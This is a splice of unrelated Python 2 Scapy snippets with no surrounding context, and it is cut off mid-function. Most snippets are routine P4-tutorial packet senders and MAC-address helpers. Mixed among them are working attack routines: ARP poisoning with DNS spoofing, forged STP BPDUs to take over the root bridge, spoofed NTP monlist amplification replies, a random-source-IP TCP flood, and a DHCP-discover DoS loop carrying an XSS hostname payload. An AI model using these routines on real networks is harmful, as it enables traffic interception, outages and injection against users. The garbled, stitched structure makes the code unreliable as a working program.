def main():
if len(sys.argv) < 4:
print 'pass 2 arguments: <destination> "<message>" <packetType> <#packets>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "Sending %s packets" % (sys.argv[3])
if sys.argv[3] == "tcp":
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / TCP(
dport=4321, sport=1234) / sys.argv[2]
elif sys.argv[3] == "udp":
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
dst=addr, options=IPOption_MRI(count=0, swtraces=[])) / UDP(
dport=4321, sport=1234) / sys.argv[2]
else:
print "Unrecognized packet"
pkt.show2()
try:
for i in range(int(sys.argv[4])):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def __parseCmdLine(self, cfg=None):
'''
Parse whatever argparse has got.
'''
errcode = 0
errmsg = ''
if cfg == None:
errcode = 1
errmsg = "[-] Unable to parse command line args."
return (errcode, errmsg)
# validate cmd line args
if cfg.iface in get_if_list():
self.__iface = cfg.iface
self.__ifaceOldMac = get_if_hwaddr(self.__iface)
if cfg.mac is None: self.__ifaceMac = get_if_hwaddr(self.__iface)
else: self.__ifaceMac = cfg.mac
else:
errcode = 2
errmsg = "[-] No such interface: " + cfg.iface
return (errcode, errmsg)
if cfg.threads > 0: self.__threads = cfg.threads
else:
errcode = 3
errmsg = "[-] A positive number of threads must be given."
self.__vlanIds = self.__parseVlanIdString(cfg.vlanIds)
if self.__vlanIds == []:
errcode = 10
errmsg = "[-] vlan range string is invalid."
return (errcode, errmsg)
return (errcode, errmsg)
def main():
if len(sys.argv) < 3:
print 'pass 1 arguments: <destination> '
exit(1)
#dst addr
addr = socket.gethostbyname(sys.argv[1])
#src addr
addr1 = socket.gethostbyname(sys.argv[2])
iface = "veth0"
iface_1 = "veth2"
iface_2 = "veth4"
out_ether = Ether(src=get_if_hwaddr(iface),
dst='00:00:00:00:00:01',
type=0x894f)
in_ether = Ether(src=get_if_hwaddr(iface),
dst='00:00:00:00:00:01',
type=0x800)
# pkt = Ether(dst='00:00:00:00:00:02') / pkt / IP(src=addr1,dst=addr) / "hi"
pkt1 = out_ether / NSH() / in_ether / IP(src=addr1, dst=addr) / "hi"
# pkt = pkt /IP(src=addr1,dst=addr) / TCP(dport=1234, sport=random.randint(49152,65535)) / "hi"
# pkt.show2()
pkt1.show()
hexdump(pkt1)
sendp(pkt1, iface=iface, verbose=False)
print "sending on interface %s (Bmv2 port 0) to dmac=00:00:00:00:00:01" % (
iface)
def main():
if len(sys.argv) < 3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
dst=addr, options=IPOption_MRI(count=0, pathid=0, swtraces=[])) / UDP(
dport=4321, sport=1234) / sys.argv[2]
# pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(
# dst=addr, options = IPOption_MRI(count=2,
# swtraces=[SwitchTrace(swid=0,qdepth=0), SwitchTrace(swid=1,qdepth=0)])) / UDP(
# dport=4321, sport=1234) / sys.argv[2]
#pkt2.show2()
#hexdump(pkt)
try:
for i in range(int(sys.argv[3])):
pkt2 = Ether(src=get_if_hwaddr(iface),
dst="ff:ff:ff:ff:ff:ff") / IP(
dst=addr,
options=IPOption_MRI(
count=0, pathid=1, swtraces=[])) / UDP(
dport=4321, sport=1234) / sys.argv[2]
pkt2.show2()
sendp(pkt2, iface=iface)
#sleep(1)
except KeyboardInterrupt:
raise
def aliveThread(self):
while True:
time.sleep(5)
self.lock_alive.acquire()
if (self.leader_alive == 1):
pkt = Ether(src=get_if_hwaddr(self.iface),
dst='ff:ff:ff:ff:ff:ff',
type=TYPE_GVT)
pkt = pkt / GvtProtocol(
flag=TYPE_FAILURE, value=0, pid=self.pid)
sendp(pkt, iface=self.iface,
verbose=False) #this is a PING! leader alive?
self.leader_alive = 0
#print "ping"
else:
#trigger recovery...
self.change_interface()
self.leader_alive = 1 #necessario para nao entrar nessa condicao logo que o novo leader e escolhido
#envia pacote de start changeS
pkt = Ether(src=get_if_hwaddr(self.iface),
dst='ff:ff:ff:ff:ff:ff',
type=TYPE_GVT)
pkt = pkt / GvtProtocol(
flag=TYPE_VIEWCHANGE, value=0, pid=self.pid)
sendp(pkt, iface=self.iface, verbose=False)
self.lock_alive.release()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('ip_addr',
type=str,
help="The destination IP address to use")
parser.add_argument('message',
type=str,
help="The message to include in packet")
parser.add_argument(
'--dst_id',
type=int,
default=None,
help=
'The myTunnel dst_id to use, if unspecified then myTunnel header will not be included in packet'
)
args = parser.parse_args()
addr = socket.gethostbyname(args.ip_addr)
dst_id = args.dst_id
iface = get_if()
if (dst_id is not None):
print "sending on interface {} to dst_id {}".format(iface, str(dst_id))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / MyTunnel(dst_id=dst_id) / IP(dst=addr) / args.message
else:
print "sending on interface {} to IP addr {}".format(iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr) / TCP(
dport=1234, sport=random.randint(49152, 65535)) / args.message
pkt.show2()
# hexdump(pkt)
# print "len(pkt) = ", len(pkt)
sendp(pkt, iface=iface, verbose=False)
def __parseCmdLine(self, cfg = None):
'''
Parse whatever argparse has got.
'''
errcode = 0
errmsg = ''
if cfg == None:
errcode = 1
errmsg = "[-] Unable to parse command line args."
return (errcode, errmsg)
# validate cmd line args
if cfg.iface in get_if_list():
self.__iface = cfg.iface
self.__ifaceOldMac = get_if_hwaddr(self.__iface)
if cfg.mac is None: self.__ifaceMac = get_if_hwaddr(self.__iface)
else: self.__ifaceMac = cfg.mac
else:
errcode = 2
errmsg = "[-] No such interface: " + cfg.iface
return (errcode, errmsg)
if cfg.threads > 0: self.__threads = cfg.threads
else:
errcode = 3
errmsg = "[-] A positive number of threads must be given."
self.__vlanIds = self.__parseVlanIdString(cfg.vlanIds)
if self.__vlanIds == []:
errcode = 10
errmsg = "[-] vlan range string is invalid."
return (errcode, errmsg)
return (errcode, errmsg)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--p", help="Protocol name To send TCP/UDP etc packets", type=str)
parser.add_argument("--des", help="IP address of the destination", type=str)
parser.add_argument("--m", help="Raw Message", type=str)
parser.add_argument("--dur", help="in seconds", type=str)
args = parser.parse_args()
if args.p and args.des and args.m and args.dur:
addr = socket.gethostbyname(args.des)
iface = get_if()
if args.p == 'UDP':
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr, tos=1) / UDP(dport=4321, sport=1234) / args.m
pkt.show2()
try:
for i in range(int(args.dur)):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
elif args.p == 'TCP':
pkt = Ether(src=get_if_hwaddr(iface), dst="ff:ff:ff:ff:ff:ff") / IP(dst=addr, tos=1) / TCP() / args.m
pkt.show2()
try:
for i in range(int(args.dur)):
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def send_Custom_pkt():
global dq1
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
while(1):
if len(dq1) > 0:
currtid = dq1.popleft()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') /IP(dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=currtid) / sys.argv[2]
#pkt.show2()
sendp(pkt, iface=iface, verbose=False)
if len(dq2) > 0:
currtid = dq2.popleft()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') /IP(dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=currtid) / sys.argv[2]
#pkt.show2()
sendp(pkt, iface=iface, verbose=False)
if len(dq3) > 0:
currtid = dq3.popleft()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') /IP(dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=currtid) / sys.argv[2]
#pkt.show2()
sendp(pkt, iface=iface, verbose=False)
print "len dq1 {} dq2 {} dq3 {} ".format(len(dq1), len(dq2), len(dq3))
print "len wd1 {} wd2 {} wd3 {} ".format(dq1_wnd, dq2_wnd, dq3_wnd)
def send_packet(pkt_ip, cnt=1, ipVer=8, iface=None):
"""send packet through eth0 or 1st available interfaces"""
if iface is None:
ifs = get_if_list()
for i in ifs:
if "eth0" in i:
iface = i
break
if not iface: # tmp test
iface = 'lo'
if ipVer == 8:
pkt = Ether(src=get_if_hwaddr(iface),
dst='ff:ff:ff:ff:ff:ff',
type=0x888)
elif ipVer == 6:
pkt = Ether(src=get_if_hwaddr(iface),
dst='ff:ff:ff:ff:ff:ff',
type=0x86DD)
else:
print("IP version {} is not supported. Abort Early".format(inVer))
exit(1)
pkt = pkt / pkt_ip
pkt.show()
hexdump(pkt)
t0 = time.time()
sendp(pkt, iface=iface, count=cnt, inter=0.001, verbose=True)
t_span = time.time() - t0
print("send {} IPv{} packts use {} sec".format(cnt, ipVer, t_span))
return iface
def send_packet(context, srcaddr=None, hlim=None, valid=3600, pref=1800):
from scapy.all import get_if_hwaddr
from scapy.all import sendp, Ether, IPv6
from scapy.all import ICMPv6ND_RA
from scapy.all import ICMPv6NDOptPrefixInfo
in_if = "test10"
out_if = "test11"
p = Ether(dst=get_if_hwaddr(out_if), src=get_if_hwaddr(in_if))
if srcaddr or hlim:
if hlim:
p /= IPv6(dst="ff02::1", hlim=int(hlim))
else:
p /= IPv6(dst="ff02::1", src=srcaddr)
else:
p /= IPv6(dst="ff02::1")
valid, pref = int(valid), int(pref)
p /= ICMPv6ND_RA()
p /= ICMPv6NDOptPrefixInfo(prefix="fd00:8086:1337::",
prefixlen=64,
validlifetime=valid,
preferredlifetime=pref)
sendp(p, iface=in_if)
sendp(p, iface=in_if)
sleep(3)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('ip_addr', type=str, help="The destination IP address to use")
parser.add_argument('message', type=str, help="The message to include in packet")
parser.add_argument('country_id', type=str, help="The destination country address to use")
parser.add_argument('state_id', type=str, help="The destination state address to use")
parser.add_argument('city_id', type=str, help="The destination city address to use")
parser.add_argument('as_num', type=str, help="The destination AS address to use")
#parser.add_argument('--dst_id', type=int, default=None, help='The myTunnel dst_id to use, if unspecified then myTunnel header will not be included in packet')
args = parser.parse_args()
addr = socket.gethostbyname(args.ip_addr)
arg0 = args.country_id
arg1 = args.state_id
arg2 = args.city_id
arg3 = args.as_num
iface = get_if()
if (arg0 is not None):
print "sending on interface {} to country_id {}".format(iface, arg0)
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / MyHeader(country_id = arg0 , state_id =arg1 , city_id = arg2 , as_num = arg3) / IP(dst=addr) / args.message
else:
print "sending on interface {} to IP addr {}".format(iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr) / TCP(dport=1234, sport=random.randint(49152,65535)) / args.message
#pkt.show2()
# hexdump(pkt)
# print "len(pkt) = ", len(pkt)
sendp(pkt, iface=iface, verbose=False)
def main():
if len(sys.argv) < 3:
print 'pass 1 arguments: <destination> '
exit(1)
#src addr
addr = socket.gethostbyname(sys.argv[1])
#dst addr
addr1 = socket.gethostbyname(sys.argv[2])
iface = sys.argv[3]
out_ether = Ether(src=get_if_hwaddr(iface),
dst='00:00:00:00:00:01',
type=0x894f)
in_ether = Ether(src=get_if_hwaddr(iface),
dst='00:00:00:00:00:01',
type=0x800)
pkt1 = out_ether / NSH() / in_ether / IP(src=addr, dst=addr1) / TCP(
dport=80, sport=20) / "hi"
pkt1.show()
hexdump(pkt1)
sendp(pkt1, iface=iface, verbose=False)
print "sending on interface %s (Bmv2 port 0) to dmac=00:00:00:00:00:01" % (
iface)
def main():
parser = argparse.ArgumentParser(description="Scapy sender program template")
parser.add_argument('-v', type=int, help="Specify using (4)IPv4/(6)IPv6.", default=4)
parser.add_argument('--intf', type=str, help="Specify interface.", default="eth0")
parser.add_argument('--dip', type=str, help="The destination IP address.", default="255.255.255.255")
parser.add_argument('--l4', type=str, help="Specify using TCP or UDP.", default="tcp")
# parser.add_argument('--loop', type=int, help="Number of loop.", default=0)
# parser.add_argument('--msg', type=str, help="The message which will send to dst.",default="Hello World")
parser.add_argument('--dport', type=int, help="TCP/UDP destination port.", default=1234)
parser.add_argument('--sport', type=int, help="TCP/UDP source port.", default=random.randint(49152,65535))
# parse
args = parser.parse_args()
# parser.print_help()
# get value from args
ipv = args.v
addr = socket.gethostbyname(args.dip)
iface = args.intf #get_if()
dip = args.dip
l4flag = args.l4
dport = args.dport
sport = args.sport
# print all
print("IP version: IPv", ipv)
print("Destination IP address: ", dip)
print("Interface: ", iface)
print("Layer 4: ", l4flag)
print("Desintation Port number: ", dport)
print("Source Port number: ", sport)
# start to pack
if ipv is 4:
print "sending on interface {} to IP addr {}".format(iface, str(addr))
# for x in range(0, args.loop):
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
if l4flag is 'tcp':
pkt = pkt / IP(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template"
else:
pkt = pkt / IP(dst=addr) / UDP(dport=dport, sport=sport) / "Scapy Template"
# show
pkt.show2()
# send
sendp(pkt, iface=iface, verbose=True)
# sleep
time.sleep(1)
elif ipv is 6:
print "sending on interface {} to IPv6 addr {}".format(iface, str(addr))
#for x in range(0, args.loop):
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IPv6(dst=addr) / TCP(dport=dport, sport=sport) / "Scapy Template"
# show
pkt.show2()
# send
sendp(pkt, iface=iface, verbose=False)
def Start_Attack(self):
self.targets, self.domains = {}, []
if self.myListDns.count() != 0:
for index in xrange(self.myListDns.count()):
self.domains.append(str(self.myListDns.item(index).text()))
for i in self.domains:
self.targets[i] = ''
self.myDNsoutput.clear()
if not self.configure.Settings.get_setting(
'accesspoint', 'statusAP', format=bool):
if (len(self.txt_target.text())
and len(self.txt_gateway.text())) == 0:
return QtGui.QMessageBox.warning(
self, 'Error Dnsspoof', 'you need set the input correctly')
if (len(self.txt_target.text()) and len(self.txt_gateway.text())
) and len(self.txt_redirect.text()) != 0:
Refactor.set_ip_forward(1)
arp_gateway = ThARP_posion(
str(self.txt_target.text()), str(self.txt_gateway.text()),
get_if_hwaddr(str(self.ComboIface.currentText())))
arp_gateway.setObjectName('Arp Posion:: [gateway]')
threadloading['arps'].append(arp_gateway)
arp_gateway.start()
arp_target = ThARP_posion(
str(self.txt_gateway.text()), str(self.txt_target.text()),
get_if_hwaddr(str(self.ComboIface.currentText())))
arp_target.setObjectName('Arp Posion:: [target]')
threadloading['arps'].append(arp_target)
arp_target.start()
self.thr = ThSpoofAttack(self.targets,
str(self.ComboIface.currentText()),
'udp port 53', True,
str(self.txt_redirect.text()))
else:
self.thr = ThreadDNSspoofNF(self.targets,
str(self.ComboIface.currentText()),
str(self.txt_redirect.text()),
APmode=True)
self.thr.DnsReq.connect(self.get_outputDNSspoof)
self.connect(self.thr, QtCore.SIGNAL('Activated ( PyQt_PyObject ) '),
self.StopArpAttack)
self.thr.setObjectName('Dns Spoof')
self.ThreadDirc['dns_spoof'].append(self.thr)
self.StatusMonitor(True, 'dns_spoof')
self.btn_Attack_Posion.setEnabled(False)
self.btn_Stop_Posion.setEnabled(True)
self.thr.start()
def run(interface):
pkt = sniff(stop_filter=lambda x: x.haslayer(STP), iface=interface)
pk_list={x:y for x,y in pkt.sessions().iteritems() if "Other" in x}
item=pk_list.popitem()
pkts = item[1]
for x in pkts:
if STP in x:
STP_packet = x
break
myMAC = get_if_hwaddr(interface)
root_id = STP_packet.rootid - 1
bridge_id = STP_packet.bridgeid - 1
p_ether = Dot3(dst="01:80:c2:00:00:00", src=myMAC)
p_llc = LLC()
p_stp = STP(bpdutype=0x00, bpduflags=0x01, portid=0x8002, rootmac=myMAC, bridgemac=myMAC,
rootid=root_id, bridgeid=bridge_id)
pkt = p_ether/p_llc/p_stp
try:
while 1:
sendp(pkt, iface=interface, verbose=0)
except KeyboardInterrupt:
pass
def main():
if len(sys.argv) < 3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
if len(sys.argv) > 3:
tos = int(sys.argv[3]) % 256
else:
tos = 0
ether_dst = get_dst_mac(addr)
if not ether_dst:
print "Mac address for %s was not found in the ARP table" % addr
exit(1)
print "Sending on interface %s to %s" % (iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst=ether_dst)
pkt = pkt / IP(dst=addr, tos=tos) / TCP(sport=10,
dport=20,
flags="F",
seq=3,
ack=10,
options=[
("NOP", None),
("NOP", None),
('Timestamp',
(0x89abcdef, 0x45670004)),
]) / sys.argv[2]
sendp(pkt, iface=iface, verbose=False)
def main():
if len(sys.argv) < 3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
#hexdump(pkt)
try:
for i in range(int(sys.argv[3])):
w = random.randint(1, 250)
x = random.randint(1, 250)
y = random.randint(1, 250)
z = random.randint(1, 250)
pkt = pkt = Ether(
src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(
src='{}.{}.{}.{}'.format(w, x, y, z), dst=addr) / TCP(
dport=1234, sport=random.randint(49152,
65535)) / sys.argv[2]
sendp(pkt, iface=iface)
sleep(0.01)
except KeyboardInterrupt:
raise
def send_Custom_pkt(id_t):
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(
dst=addr) / UDP(dport=4321, sport=1234) / tenant(id=id_t) / sys.argv[2]
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def __init__(self, iface="eth0", wireless=False, DEBUG=False, log=False):
self.iface = iface
self.mac = get_if_hwaddr(self.iface)
try:
self.pub_ip = gu.get_pub_ip()
except:
print "Not connected to the internet.." # I still don't see it as much of a problem
try:
self.gateway = gu.get_default_gateway()
except:
raise Exception("noDefGateway")
self.poison_pid = 0
self.router_mac = getmacbyip(self.gateway)
self.wireless = wireless # currently this flag needs to be set manually (during obj init or obj.wireless = True)
self.debug = DEBUG # un-shutthefuckups scapy and prints internal values
self.log = log
if self.debug:
print self.iface
print self.mac
print self.gateway
print self.router_mac
print self.wireless
conf.verb = 3
if self.log:
with open("/var/log/fun&games.log", "a") as f:
f.write("Started a session on ip: " + self.pub_ip + " at " +
str(datetime.now()) + "\n")
def Start_Attack(self):
if (len(self.txt_target.text()) and len(self.txt_mac.text()) and len(self.txt_gateway.text())) == 0:
QMessageBox.information(self, 'Error Arp Attacker', 'you need set the input correctly')
else:
chdir(self.owd)
if (len(self.txt_target.text()) and len(self.txt_gateway.text())) and len(self.txt_mac.text()) != 0:
if len(self.txt_redirect.text()) != 0:
self.StatusMonitor(True,'stas_arp')
Refactor.set_ip_forward(1)
arp_gateway = ThARP_posion(str(self.txt_gateway.text()),str(self.txt_target.text()),
get_if_hwaddr(str(self.ComboIface.currentText())))
arp_gateway.setObjectName('Arp Poison:: [gateway]')
self.ThreadDirc['Arp_posion'].append(arp_gateway)
arp_gateway.start()
arp_target = ThARP_posion(str(self.txt_target.text()),str(self.txt_gateway.text()),
str(self.txt_mac.text()))
self.connect(arp_target,SIGNAL('Activated ( QString ) '), self.StopArpAttack)
arp_target.setObjectName('Arp::Poison => [target]')
self.ThreadDirc['Arp_posion'].append(arp_target)
arp_target.start()
redirectPackets = ThSpoofAttack('',
str(self.ComboIface.currentText()),'udp port 53',True,str(self.txt_redirect.text()))
self.connect(redirectPackets,SIGNAL('Activated ( QString ) '), self.StopArpAttack)
redirectPackets.setObjectName('Packets Spoof')
self.ThreadDirc['Arp_posion'].append(redirectPackets)
redirectPackets.start()
return
QMessageBox.information(self,'Error Redirect IP','Redirect IP is not found')
def main():
if len(sys.argv)<2:
print 'pass 2 arguments: <destination>'
exit(1)
#addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, sys.argv[1])
while True:
print
s = str(raw_input('Type space separated port nums '
'(example: "4 3 1 2 2 ") or "q" to quit: '))
if s == "q":
break;
print
pkt = Ether(src=get_if_hwaddr(iface), dst='00:aa:00:00:00:01')
pkt = pkt / IPv6(dst=sys.argv[1], nh=150) / MRI(count=0, swtraces=[])
#pkt = pkt / SwitchTrace(swid=0, in_port=0, out_port=0, qdepth=0, in_time=0, out_time=0, bos=0)
#pkt = pkt / SwitchTrace(swid=0, in_port=0, out_port=0, qdepth=0, in_time=0, out_time=0, bos=0)
#pkt = pkt / UDP(dport=4321, sport=1234) / "P4 is cool"
pkt.show2()
for i in range(int(sys.argv[2])):
sendp(pkt, iface=iface, verbose=False)
sleep(1)
def __init__(self, label, iface, logger, promisc=True):
"""
Initialize member variables.
Args:
label (str):
Human-readable label for this interface.
iface (str):
ScaPy interface-ID string. (See list_eth_interfaces.)
logger (Logger):
Logger object (logging.Logger) for reporting errors.
promisc (bool):
Enable promiscuous mode? (Default True)
May require admin/root privileges.
"""
self._iface = sca.conf.L2socket(iface, promisc=promisc)
self.lbl = label
self.mac = str2mac(sca.get_if_hwaddr(iface))
self._callback = None
self._log = logger
self._rx_run = True
# Reduce ScaPy verbosity (default is rather high).
sca.conf.verb = 0
# Create and start the worker thread.
self._rx_thread = threading.Thread(target=self._rx_loop,
name='Ethernet receive')
self._rx_thread.setDaemon(True)
self._rx_thread.start()
def getMAC(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception, e:
shutdown("[Utils] Error retrieving MAC address from {}: {}".format(
interface, e))
def main():
if len(sys.argv) < 4:
print 'pass 3 arguments: <op> <keyhash> "<message>" (node)'
exit(1)
op = int(sys.argv[1])
keyhash = int(sys.argv[2])
msg = sys.argv[3]
if len(sys.argv) > 4:
node = int(sys.argv[4])
else:
node = 0
iface = get_if()
if op == OP_REP:
dst_ip = client_ip
dst_mac = client_mac
else:
dst_ip = server_ip
dst_mac = server_mac
print "sending on interface %s to %s" % (iface, str(dst_ip))
pkt = Ether(src=get_if_hwaddr(iface), dst=dst_mac)
pkt = pkt / IP(dst=dst_ip) / UDP(
dport=12345, sport=random.randint(49152, 65535)) / Pegasus(
op=op, keyhash=keyhash, node=node) / msg
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def main():
if len(sys.argv) < 3:
print 'pass 3 arguments: <destination> <num>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
num = int(sys.argv[2])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
while num > 0:
num = num - 1
s = "2 2 1"
i = 0
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
for p in s.split(" "):
try:
pkt = pkt / SourceRoute(bos=0, port=int(p))
i = i + 1
except ValueError:
pass
if pkt.haslayer(SourceRoute):
pkt.getlayer(SourceRoute, i).bos = 1
pkt = pkt / IP(
dst=addr, options=IPOption_MRI(
count=0, pathid=1, swtraces=[])) / UDP(dport=4321, sport=1234)
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def main():
if len(sys.argv)<2:
print 'pass 2 arguments: <destination>'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
while True:
print
s = str(raw_input('Type space separated port nums '
'(example: "2 3 2 2 1") or "q" to quit: '))
if s == "q":
break;
print
i = 0
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff');
for p in s.split(" "):
try:
pkt = pkt / SourceRoute(bos=0, port=int(p))
i = i+1
except ValueError:
pass
if pkt.haslayer(SourceRoute):
pkt.getlayer(SourceRoute, i).bos = 1
pkt = pkt / IP(dst=addr) / UDP(dport=4321, sport=1234)
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def __init__(self, **config_params):
"""Initialize the class with the required network and packet params.
Args:
config_params: contains all the necessary packet parameters.
Some fields can be generated automatically. For example:
{'subnet_mask': '255.255.255.0',
'dst_ipv4': '192.168.1.3',
'src_ipv4: 'get_local', ...
The key can also be 'get_local' which means the code will read
and use the local interface parameters
"""
interf = config_params['interf']
self.packet = None
self.dst_mac = config_params['dst_mac']
if config_params['src_mac'] == GET_FROM_LOCAL_INTERFACE:
self.src_mac = scapy.get_if_hwaddr(interf)
else:
self.src_mac = config_params['src_mac']
self.dst_ipv4 = config_params['dst_ipv4']
if config_params['src_ipv4'] == GET_FROM_LOCAL_INTERFACE:
self.src_ipv4 = scapy.get_if_addr(interf)
else:
self.src_ipv4 = config_params['src_ipv4']
def main():
if len(sys.argv) < 3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
# pkt.show2()
# If exist sys.argv[3], treat it as number of sending packets
try:
if (sys.argv[3] != None):
for i in range(int(sys.argv[3])):
# each sending packet need to reset
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff')
pkt = pkt / IP(dst=addr) / TCP(dport=1234,
sport=random.randint(
49152, 65535)) / sys.argv[2]
sendp(pkt, iface=iface)
sleep(1)
except KeyboardInterrupt:
raise
def send_carrier(length):
iface= get_if()
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff', type=0x1234);
pkt = pkt/CARRIER(length=length)
sendp(pkt, iface=iface, verbose=False)
def get_mac(interface):
try:
mac_address = get_if_hwaddr(interface)
return mac_address
except Exception as e:
shutdown("Error retrieving MAC address from {0}: {1}".format(
interface, e))
def handle_pkt(pkt, iface):
my_mac = get_if_hwaddr(iface)
my_ip = get_ip_address(iface)
NTP_ITEMS = "\x06"
NTP_ITEMS_INT = 6
NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT
if UDP in pkt and IP in pkt and pkt[IP].src != my_ip:
src_mac = my_mac
dst_mac = pkt[Ether].dst
src_ip = my_ip
dst_ip = pkt[IP].dst
proto = pkt[IP].proto
sport = pkt[UDP].sport
dport = pkt[UDP].dport
# Respond with 10 packages with 6 items each = 60 items * 72 bytes = 4320 data bytes
p = Ether(dst=my_mac, src=dst_mac) / IP(dst=pkt[IP].src, src=my_ip)
p = p / UDP(dport=123, sport=123) / Raw(NTP_MONLIST_RESPONSE)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
sendp(p, iface=iface, loop=0, verbose=0)
def create_mac_filter(iface):
'''tcpdump can not cactch all 6 octets so it is splitted.
See http://blog.jasonantman.com/2010/04/dhcp-debugging-and-handy-tcpdump-filters # noqa
'''
mac = scapy.get_if_hwaddr(iface).split(':')
filter1 = '(udp[36:2] = 0x{0})'.format(''.join(mac[:2]))
filter2 = '(udp[38:4] = 0x{0})'.format(''.join(mac[2:]))
return '{0} and {1}'.format(filter1, filter2)
def main():
if len(sys.argv)<3:
print 'pass 2 arguments: <destination> "<message>"'
exit(1)
addr = socket.gethostbyname(sys.argv[1])
iface = get_if()
print "sending on interface %s to %s" % (iface, str(addr))
pkt = Ether(src=get_if_hwaddr(iface), dst='ff:ff:ff:ff:ff:ff') / IP(dst=addr) / UDP(dport=4321, sport=1234) / sys.argv[2]
pkt.show2()
sendp(pkt, iface=iface, verbose=False)
def get_pc_info(self):
self.PC = {}
for r in conf.route.routes:
if("0.0.0.0" not in r[2]):
ba = r[2].split(".")
self.PC["BASE"] = ba[0]+"."+ba[1]+"."+ba[2]+"."
self.PC["IP"] = r[4]
self.PC["MAC"] = get_if_hwaddr(r[3])
self.PC["IFACE"] = r[3];
if(self.PC["BASE"]=="") or (self.PC["IP"]=="") or (self.PC["MAC"]=="") or (self.PC["IFACE"]==""):
dialog = Gtk.MessageDialog(None, 0, Gtk.MessageType.ERROR,
Gtk.ButtonsType.OK, "Error")
dialog.format_secondary_text("Cannot find iface, gateway, IP or MAC.")
dialog.run()
dialog.destroy()
exit(1)
def run(interface,xs):
"""
This function launch DHCP DISCOVER DOS attack
:param inter: interface to be launched the attack
:type inter: str
"""
global src_mac
global xi
global follow
global inter
follow=False
#if len(interface) > 0:
inter = interface
if xs == "":
xss="<script>alert('hola')</script>"
else:
xss=xs
try:
src_mac= get_if_hwaddr(inter)
print str(src_mac)
ethernet = Ether(dst='ff:ff:ff:ff:ff:ff', src=str(src_mac), type=0x800)
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
while not follow:
xi = RandString(8, "1234567890abcdef")
xi = "0x"+str(xi)
res = src_mac.split(":")
ch=""
for i in res:
ch=ch + chr(int(i,16))
bootps = BOOTP(xid=int(xi,16), ciaddr='0.0.0.0',chaddr=ch)
host = "<script>alert('hola')</script>"
dhcps = DHCP(options=[("message-type", "discover"),("hostname",host), "end"])
packet = ethernet / ip / udp / bootps / dhcps
conf.checkIPaddr = False
